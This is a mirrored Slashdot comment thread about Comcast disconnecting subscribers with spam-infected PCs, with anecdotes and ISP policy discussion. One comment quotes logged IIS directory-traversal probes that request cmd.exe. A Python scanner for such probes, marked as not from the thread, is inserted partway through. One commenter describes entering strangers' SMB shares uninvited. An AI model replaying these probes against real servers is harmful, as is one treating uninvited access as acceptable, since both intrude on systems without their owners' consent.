Slashdot Mirror


Comcast Cuts Infected PCs' Network Connections

fidget42 writes "I just noticed this article over at Infoworld. It seems that Comcast is finally doing something about the machines on their network that are being used by spammers. They are now cutting off service to those customers who have computers that have been hijacked by spammers. Now, if only other broadband ISPs would start policing their user base ..."

16 of 592 comments

  1. Cox does this... by h0mer · · Score: 5, Informative

    I know anecdotal evidence is pretty much worthless, but my friend got infected with all sorts of nasty ad/malwares, along with Blaster and a couple other worms. Cox deactivated his cable modem, he had to call them and go through phone hell to get his service back. So I'm not really sure it's only Comcast doing this.

    --
    I'm on top of my game like I'm standin' on Xbox.
  2. Happened to me. by Anonymous Coward · · Score: 3, Informative

    I had a machine on AT&T (now Comcast) that was infected by a worm. Bummer. I'll tell you, you have to keep up with those service packs even if you're going to directly connect to the network for "just a few hours".

    Anyhow, my friends at AT&T Broadband (the ones that never answered their phone) sent me a nastygram telling me that I was doing a bit too much port scanning for their liking (duh...)

    So I ripped the machine off the network and poked around. Yep, it turned out that my machine was infected a few hours after I installed the OS, and it was doing its bad thing for WEEKS.

    At the time, AT&T just "informed me" that I should stop doing bad things. I think it would have been prudent for them to kill my service until I took corrective action.

    Of course, this was 3 years ago or so... a more innocent time...

  3. Comcast Terms Of Service / Acceptable Use Policy by SignalFreq · · Score: 3, Informative

    Here is Comcast's Terms Of Service.

    From the AUP:
    Note: Comcast reserves the right to immediately terminate the Service and the Subscriber Agreement if you engage in any of the prohibited activities listed in this AUP or if you use the Comcast Equipment or Service in a way which is contrary to any Comcast policies or any of Comcast's suppliers' policies. You must strictly adhere to any policy set forth by another service provider accessed through the Service.

    So they can terminate service, based on violation of the subarticles:

    (vii) restrict, inhibit, or otherwise interfere with the ability of any other person, regardless of intent, purpose or knowledge, to use or enjoy the Service, including, without limitation, posting or transmitting any information or software which contains a worm, virus, or other harmful feature, or generating levels of traffic sufficient to impede others' ability to send or retrieve information;

    And transmitting a virus is definitely a violation. Still, it would be nice if there was more information on what will cause them to pull the plug.

  4. Re:Other ISPs start to do this? by mikeophile · · Score: 5, Informative

    Take a look at this site and you will be able to imagine it quite easily.

  5. Re:Nice but... by Flashbak · · Score: 3, Informative

    Why would you need to send test email, be they viruses or spam, via your ISP's network? If you need to test filters or anti-virus configuration on your mail server, do it locally - surely that's the responsible thing to do. I wouldn't want to propagate a virus, even the EICAR test virus, outside of the networks I directly control. (Yes, I'm well aware the EICAR test is benign, but that's not the point.)

  6. Re:Nice but... by caino59 · · Score: 4, Informative
    this is for the people's machines that are constantly trying to hit other machines and infect them....

    you know, where you see stuff like this recurring in your web server's logs...offending ip removed...

    .client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 332

    .client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 332

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 376

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 376

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

    .client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

    .client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

    .client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

    .client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    .client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    the people they are cutting off are sending out daily attacks to multiple machines, not just once or twice sending out crap here and there. i think you'll be ok.
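As an added defender-side example (not code from the thread or from any ISP), here is a small Python scanner for the kind of probe lines caino59 quotes: it parses Apache common-log lines, flags request paths that use directory traversal, double URL encoding or overlong UTF-8 to reach cmd.exe/root.exe, and counts hits per client so a host that probes repeatedly stands out. The hostnames and log lines are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log, in the style of the probes quoted above.
# The client hostnames are placeholders, not real hosts.
SAMPLE_LOG = """\
host-a.client.example.net - - [09/Mar/2004:14:43:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 332
host-a.client.example.net - - [09/Mar/2004:14:43:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346
host-a.client.example.net - - [09/Mar/2004:14:43:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356
host-a.client.example.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357
host-b.client.example.net - - [09/Mar/2004:14:44:10 -0500] "GET /index.html HTTP/1.1" 200 1024
host-b.client.example.net - - [09/Mar/2004:14:44:11 -0500] "GET /images/logo.png HTTP/1.1" 200 5120
"""

# Apache/NCSA common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# What Code Red / Nimda style probes ask for once the path is decoded.
SUSPICIOUS_TARGETS = ("cmd.exe", "root.exe", "/winnt/system32")
# Overlong UTF-8 sequences (%c0%af, %c1%1c, %c1%9c ...) smuggle "/" or "\"
# past naive decoders; %25 and %% are double-encoded percent signs.
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)
DOUBLE_ENC_RE = re.compile(r"%25|%%", re.IGNORECASE)


def classify_request(path):
    """Return the list of reasons a request path looks like a worm probe."""
    reasons = []
    # Decode twice so %255c -> %5c -> "\" is seen for what it is,
    # then normalise backslashes so both separators read as "../".
    decoded = unquote(unquote(path)).replace("\\", "/").lower()
    if "../" in decoded:
        reasons.append("directory traversal")
    if any(t in decoded for t in SUSPICIOUS_TARGETS):
        reasons.append("command shell request")
    if OVERLONG_RE.search(path):
        reasons.append("overlong UTF-8 encoding")
    if DOUBLE_ENC_RE.search(path):
        reasons.append("double URL encoding")
    return reasons


def scan_log(text, threshold=3):
    """Count probe requests per client host; return hosts at or over threshold."""
    hits = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore malformed lines rather than abort the scan
        if classify_request(m.group("path")):
            hits[m.group("host")] += 1
    return {host: n for host, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    for host, n in scan_log(SAMPLE_LOG).items():
        print(f"{host}: {n} probe requests")
```

The threshold keeps a single stray request from being reported; the hosts it returns are the repeat offenders worth an abuse report to their ISP.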

  7. Re:Or maybe... by Chalybeous · · Score: 3, Informative

    Grandparent has a fair point, but parent reflects the situation where I am.
    I use my university's network for internet access, paying UK60 a year for access in my room. At the start of the year there were a lot of virus-related problems, mostly people bringing machines in from home and plugging them in without a firewall or AV software.
    Network Services don't insist on this. They don't insist on a virus scan first. What they DO do is cut you off if your PC is causing a nuisance to the network, because they're only three men taking care of the main servers and staff terminals (public terminals are someone else's responsibility).
    A lot of people whine about it, but IMHO it's fair policy. They're busy enough without having to help the blissfully clueless. That said, it wouldn't kill them if your 60 included a CD with, say, ZoneAlarm and AVG on... (I distributed similar CDs to friends, with Mozilla Firebird, just so they didn't pick up anything nasty.)

    The moral of the story: well, there are two. The first is "You're paying us for the service, not for us to hold your hand and show you how to use your computer." The second is that some people really need to be beaten around the head with a clue-by-four.

    --

    "It is dark. You are likely to be eaten by a grue." -- Zork

  8. Adelphia by Anonymous Coward · · Score: 3, Informative

    The ISP I work for (Adelphia, thus Anon :) ) is working on a way to handle customers like these.

    -First, the customer is identified, then placed into a 'walled zone'.
    -This walled zone will route/allow the cable modem to go only to one specific location, a certain web page in this case.
    -Said web page will include downloads for virus fixes and such. Customer goes there, downloads, and cleans up his computer.
    -When it has been verified that the customer has gone there and cleaned up, they check his system, then reactivate his account.

    To me it seems like a pretty nifty way of stopping virus spreading while keeping the customer informed of what's going on.

  9. We do this by PhraudulentOne · · Score: 3, Informative

    I administer a large DSL/dialup userbase and I monitor upstream bandwidth as much as I can. If I notice a DSL customer that has 100% of their upstream bandwidth used, I usually check the traffic to see if it's email. I will notify the customer and give them a day or two to rectify the problem. If the problem is not fixed within 48 hours I will disable that PVC, which will effectively drop sync from the user's modem. When the customer comes home, they are now forced to fix the problem. I try to explain to them as politely as possible that they are contributing to the junk mail problem that they are always complaining about and that we had to disable their connection to prevent this. Most people understand, and the lack of internet connection gives them the initiative to get up and go purchase some AV software and to run Spybot or some similar program. They phone back once their computer is clean and I turn the circuit back on.

    --
    You create your own reality - Leave mine to me.
  10. Re:DHCP message? Since when? by roystgnr · · Score: 3, Informative

    Frankly those users have ignored all the obvious aspects of being infected (100% cable light flashing)

    My cable light has been flashing intermittently ever since the latest Windows worm. It's not because my (Fedora Linux) computer is infected, it's because every other infected computer on the net is periodically scanning my entire block of IP addresses. Every time they try to infect an unused address in that block, our helpful routers send an ARP packet to every cable modem user. I've seen more than a hundred per second during bad periods.

    Maybe DSL users (who don't have to share the same bandwidth with everyone in their neighborhood) or users at smarter cable modem companies (who could be caching these things a bit longer, not sending out ARP requests for the same IP address every few seconds) would see a difference if they were infected by a virus, but at least Road Runner Austin users are probably all used to constantly flickering cable modem lights by now.

  11. Re:Other ISPs start to do this? by drinkypoo · · Score: 5, Informative
    Unless you have supplied the cable modem, this only works when your cable provider is stupid. I worked for Cisco (interesting that their name crops up so many times on that page) and I happen to know that as they shipped the software to their licensees (among them sony and samsung) it looks for a configuration file only on the cable interface, and never on the ethernet, so in order to hijack the modem you would need your own cable head end (cisco calls them a uBR) and an up-converter, and you would have to hook it up to that head end at least every time you started it up.

    Now, most cable modems have solder pads for a diagnostic connector, which is usually a 3 wire RS-232 serial connection. Sometimes it uses an unusual voltage, and you need a little box to change the levels. If you got access to the diagnostic connector, and your modem had the proper flash image in it, then you could program it through the diagnostic interface.

    I can imagine that some modems you purchase from Fry's or what have you will look for config on ethernet, though I doubt many of them do.

    For more insight on why this typically won't work, the default route on the device typically points to the cable interface, or does not exist if the cable interface is not hot, and the device has two modes of operation with regard to IP addresses on the internal interface; either it sets itself to 192.168.100.1, or it sets itself to whatever the config file tells it, and it starts proxying DHCP requests. Either way it is not going to be able to find your bogus TFTP server on the network unless it is badly misconfigured to begin with.

    --
    "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  12. My experience with this by MobyDisk · · Score: 4, Informative

    The problem here is that Comcast is shutting down people's connections with no recourse to find out why or to re-enable them.

    I received an email and an automated phone call from Comcast stating that I had an infected computer and I must clean it up. I was immediately pleased that they noticed, but frustrated that I could be infected. 5 PCs with varying OSs, all with firewalls and/or antivirus software, so I thought it was unlikely but possible. After doing a full scan I found no viruses.

    So I called Comcast's 800 number. They said I need to call a different long-distance number. That number is an automated system with nothing but dead ends. If I select the option about "Viruses and spam emails" then it tells me to email abuse at comcast.net if I get a bad email. But I don't want to report a spam, I received a report. All the options did approximately the same thing: Told me something I already know then hung up. Several calls later, I used the "leave a message" option. A week goes by and I received no call back. I replied to the email but received no response. Nobody on the service number would talk to me about it.

    So I receive another email telling me that my service may be disabled if I don't fix the problem. So what do I do now?

    To top it off, this isn't the first time. About 8 months ago, Comcast called and told me I was reported for sending spam. When they read me part of the SpamCop report (which they refused to do many times) it turned out to be a SpamCop report that my roommate made! We _reported_ the spam, we didn't _send_ it! After much arguing, the guy finally got it and left us alone. Mistakes happen, but what irks me the most is that they wanted to tell me I sent a spam, and make sure I corrected my behavior, but refused to tell me the source of the report, or what the email was, or when it was sent, or anything!

    Below is the email Comcast sent me. It looks like a form email, with no specific statement about what went wrong.

    ***PLEASE READ FULLY***

    Comcast has received complaints about your computer. We believe it may be:

    * Infected with a virus

    * Sending "spam" email that you are unaware of

    * Allowing spammers to use your connection to send their spam

    * Trying to infect other computers on the Internet with viruses

    The health of your computer is your responsibility. Consult your computer's manufacturer if you are unable to remedy the situation.

    ***************
    EXPLANATION
    ***************

    This message was sent by the Comcast Network Abuse and Policy Observance Team. We investigate reports of Internet Abuse by our customers. We have received such a report identifying your computer.

    The complaint(s) we have received were from other users of the Internet, who are receiving email from you, which they did not request. We understand that you may not be aware of any such email, and you will not see it in your normal email program.

    Typically these types of emails are caused, or are allowed to be sent by, viruses. They are either trying to infect other user's computers, or they allow spammers to connect to YOUR computer to send their spam.

    If you have anti-virus software on your computer, we recommend visiting the manufacturer's website to update it, as it may be out of date and unable to find the virus that's causing the problem. New viruses come out frequently, so it is important to update the software often, or automatically if possible. We also recommend a security software solution, such as a firewall to further restrict access to your system. Firewalls help to prevent such activity by allowing only the software and transactions that you choose to utilize your Internet connection.

    If you are deliberately sending these emails, we ask you to stop. Further complaints will require us to suspend or even terminate your service.

    If you have further questions or would like to notif

  13. I work for Comcast by ironicsky · · Score: 4, Informative
    I agree with our cut-off policy for people infected with worms. Right now, we're not actually terminating their service, we're just blocking their SMTP and POP access so they cannot transmit viruses. In the rare case, our system will disable a customer's account if they are transmitting a virus.

    But, users are dumb, and I'll agree with that. Last summer when the Blaster worm came out, we emailed our customers ahead of time telling them they need to download the Microsoft patch.

    On top of that, the Microsoft Windows Update popup that comes up by default, once a week, users still continue to ignore it because they don't know what it does.

    Personally, I'd like to see more of this type of internet policing by ISPs. They should also be blocking people who have open SMB shares on their Windows networks. I can't count the number of times I've purposely gone into someone's SMB share and dropped a text file telling them how to fix it.

    I, however, disagree with the Government policing of the internet. I believe the internet should be policed by the people who pay for it to be there. That would be us and the ISPs.

  14. Re:Yes Yes! by GreyPoopon · · Score: 4, Informative
    While it is good that Comcast is doing something about the problem, this is a bad solution to the problem.

    We as the People-Who-Know need to be spending time helping those who don't to become self-reliant, rather than telling them 'Sorry. You can't access the net until you clean up your system. Sorry, I can't really help you do it. Call someone else.'

    Comcast is already doing this. From the article:

    "Comcast says that it is aware of the problem, is alerting customers who were hacked and helping them secure their computers."
    So, they block their access to trigger the support call, and then help them secure their machine. I think this is the right approach.
    --

    GreyPoopon
    --
    Why is it I can write insightful comments but can't come up with a clever signature?

  15. Re:Nice but... by DR+SoB · · Score: 3, Informative

    No it's not, that's some bozo trying to "root" your machine. That's a directory traversal attack they are attempting. It happens all day, every day, and it's NOT what Comcast is going after. Webserver logs show you who is trying to connect to your WEBSITE; it has NOTHING to do with SPAM. If you want to see who these bozos are, just look at the header of your spam email and do a TRACERT (or TRACERTE) to their IP address and see if it's a Comcast subnet (or names resolve...). It may be a cheap virus, it may be some hacker's scanning tool, but most Comcast customers are not running old versions of IIS (which is what they are trying to infect by the weblog you posted). Check out the Security Focus website for more information.

    --
    Mod +5 Drunk
  16. Blues Brothers by lonesome+phreak · · Score: 4, Informative

    It's a reference to the Blues Brothers, one of the greatest movies ever made. If you haven't seen it then you just don't understand the blues.

    Jake: "Hey what's goin' on?"
    Cop: "Oh those bums won their court case so they're marching today"
    Jake: "What bums?"
    Cop: "The fucking Nazi party!"
    Jake: "Illinois Nazis"
    Elwood: "I hate Illinois Nazis!"

    --
    Maybe we DID take the blue pill. You wouldn't remember anyway.